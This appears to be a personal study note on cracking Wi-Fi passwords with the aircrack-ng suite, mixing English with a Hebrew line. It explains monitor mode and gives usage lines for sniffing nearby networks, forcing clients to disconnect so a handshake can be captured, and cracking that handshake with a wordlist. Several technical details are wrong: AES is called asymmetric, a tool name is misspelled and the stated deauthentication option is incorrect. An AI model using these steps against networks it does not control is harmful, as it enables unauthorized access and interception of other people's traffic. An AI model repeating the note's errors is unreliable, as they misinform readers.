W I F I 


דוד דוד

Wi-Fi is a family of radio technologies that is commonly used for the wireless local area networking (WLAN) of devices which is based around the IEEE 802.11 family of standards. Wi-Fi is potentially more vulnerable to attack than wired networks because anyone within range of a network with a wireless network interface controller can attempt access. Wi-Fi Protected Access (WPA) is a family of technologies created to protect information moving across Wi-Fi networks and includes solutions for personal and enterprise networks. Security features of WPA have included stronger protections and new security practices as the security landscape has changed over time.

2 Things to know.

Frequency - The amount of data the wavelength can carry and to what distance. [ 2.4GHZ - 5GHZ being standard ].
Channel   - Theres roughly 14 channels to which we can choose to operate with - Helps to avoid collisions with other wifi signals.


Encryption

Radio waves carry 1 0's - This data can be encrypted with a specific algorithm ; 

		~No Ecnyrption - Clear Text
		~Wired Equivalent Privacy ( WEP ) - Old and vulnerable
		~WPA1,2,3, - Considered more secure, It uses AES  ; asymmetric encryption.
		
NOTE**** 
Network Adapater With Monitor Mode IS REQUIRED. This allows us to detect networks even if we are not connected.

Tools : 

airmon-ng : This switches us to Monitor Mode with our network card.
 usage : airmon-ng start wlan0 - wlan0mon means its active.

airodump-ng : This tool sniffs nearby networks and captures everything EVEN IF we are NOT connected to any network.
 usage : airodump-ng wlan0mon - This captures everything, but if we want something specific we can use 
		 airodump-ng wlan0mon -c "channel num" -- bssid "mac-address" -- essid " name of the wifi" -w 
		 
airplay-ng : This tool forces everyone to disconnect and re-connect, thus allowing us to capture the password HASH.
 usage : airplay-ng -3 -b "mac-address" -wlan0mon: Sends a packet on the bahalf of the router " I need to restart guys " in fancy words.
 
aircrack-ng  : 
 usage : aircrack-ng -b "mac-address" "name of handshake file" -w "word list" 

ניתן לפענח את התעבורה שכבר נתפסה באמצעות הסיסמא.



